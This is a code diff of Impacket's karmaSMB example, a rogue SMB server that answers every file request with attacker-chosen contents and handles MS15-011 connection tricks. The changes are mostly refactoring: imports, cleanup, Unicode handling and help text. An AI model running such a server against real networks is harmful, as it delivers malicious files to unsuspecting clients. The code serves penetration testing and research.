@@ -1,5 +1,5 @@
 #!/usr/bin/python
-# Copyright (c) 2015 CORE Security Technologies
+# Copyright (c) 2016 CORE Security Technologies
 #
 # This software is provided under under a slightly modified version
 # of the Apache Software License. See the accompanying LICENSE file
@@ -53,12 +53,20 @@
 import sys
 import os
 import argparse
+import logging
+import ntpath
+import ConfigParser
+from threading import Thread
 
+from impacket.examples import logger
 from impacket import smbserver, smb, version
 import impacket.smb3structs as smb2
-from impacket.smb import *
-from impacket.smbserver import *
-from impacket.examples import logger
+from impacket.smb import FILE_OVERWRITE, FILE_OVERWRITE_IF, FILE_WRITE_DATA, FILE_APPEND_DATA, GENERIC_WRITE
+from impacket.nt_errors import STATUS_USER_SESSION_DELETED, STATUS_SUCCESS, STATUS_ACCESS_DENIED, STATUS_NO_MORE_FILES, \
+    STATUS_OBJECT_PATH_NOT_FOUND
+from impacket.smbserver import SRVSServer, decodeSMBString, findFirst2, STATUS_SMB_BAD_TID, encodeSMBString, \
+    getFileTime, queryPathInformation
+
 
 class KarmaSMBServer(Thread):
     def __init__(self, smb2Support = False):
@@ -139,7 +147,6 @@ class KarmaSMBServer(Thread):
         respSetup = ''
         respParameters = ''
         respData = ''
-        errorCode = STATUS_SUCCESS
         findFirst2Parameters = smb.SMBFindFirst2_Parameters( recvPacket['Flags2'], data = parameters)
 
         # 1. Let's grab the extension and map the file's contents we will deliver
@@ -154,11 +161,6 @@ class KarmaSMBServer(Thread):
         else:
             targetFile = self.defaultFile
 
-        if (len(data) > 0):
-            findFirst2Data = smb.SMBFindFirst2_Data(data)
-        else:
-            findFirst2Data = ''
-
         if connData['ConnectedShares'].has_key(recvPacket['Tid']):
             path = connData['ConnectedShares'][recvPacket['Tid']]['path']
 
@@ -277,9 +279,7 @@ class KarmaSMBServer(Thread):
         errorCode = 0
 
         queryPathInfoParameters = smb.SMBQueryPathInformation_Parameters(flags = recvPacket['Flags2'], data = parameters)
-        if len(data) > 0: 
-           queryPathInfoData = smb.SMBQueryPathInformation_Data(data)
-  
+
         if connData['ConnectedShares'].has_key(recvPacket['Tid']):
             path = ''
             try:
@@ -322,7 +322,7 @@ class KarmaSMBServer(Thread):
         connData = smbServer.getConnectionData(connId)
         # We're closing the connection trying to flush the client's
         # cache.
-        if connData['MS15011']['StopConnection'] == True:
+        if connData['MS15011']['StopConnection'] is True:
             return [smb2.SMB2Error()], None, STATUS_USER_SESSION_DELETED
         return self.origsmb2Close(connId, smbServer, recvPacket)
 
@@ -373,7 +373,11 @@ class KarmaSMBServer(Thread):
             targetFile = '/'
         
         # 2. We change the filename in the request for our targetFile
-        ntCreateRequest['Buffer'] = targetFile.encode('utf-16le')
+        try:
+            ntCreateRequest['Buffer'] = targetFile.encode('utf-16le')
+        except UnicodeDecodeError:
+            import sys
+            ntCreateRequest['Buffer'] = targetFile.decode(sys.getfilesystemencoding()).encode('utf-16le')
         ntCreateRequest['NameLength'] = len(targetFile)*2
         recvPacket['Data'] = str(ntCreateRequest)
 
@@ -386,7 +390,7 @@ class KarmaSMBServer(Thread):
         connData = smbServer.getConnectionData(connId)
 
         respSMBCommand = smb2.SMB2QueryDirectory_Response()
-        queryDirectoryRequest   = smb2.SMB2QueryDirectory(recvPacket['Data'])
+        #queryDirectoryRequest   = smb2.SMB2QueryDirectory(recvPacket['Data'])
 
         errorCode = 0xff
         respSMBCommand['Buffer'] = '\x00' 
@@ -583,10 +587,12 @@ class KarmaSMBServer(Thread):
 
 # Process command-line arguments.
 if __name__ == '__main__':
+    # Init the example's logger theme
+    logger.init()
     print version.BANNER
-    parser = argparse.ArgumentParser(add_help = False, description = "For every file request received, this module will return the fileName contents")
+    parser = argparse.ArgumentParser(add_help = False, description = "For every file request received, this module will return the pathname contents")
     parser.add_argument("--help", action="help", help='show this help message and exit')
-    parser.add_argument('fileName', action='store', metavar = 'pathname', help='Filename''s contents to deliver to SMB clients')
+    parser.add_argument('fileName', action='store', metavar = 'pathname', help="Pathname's contents to deliver to SMB clients")
     parser.add_argument('-config', type=argparse.FileType('r'), metavar = 'pathname', help='config file name to map extensions to files to deliver. For those extensions not present, pathname will be delivered')
     parser.add_argument('-smb2support', action='store_true', default=False, help='SMB2 Support (experimental!)')
 
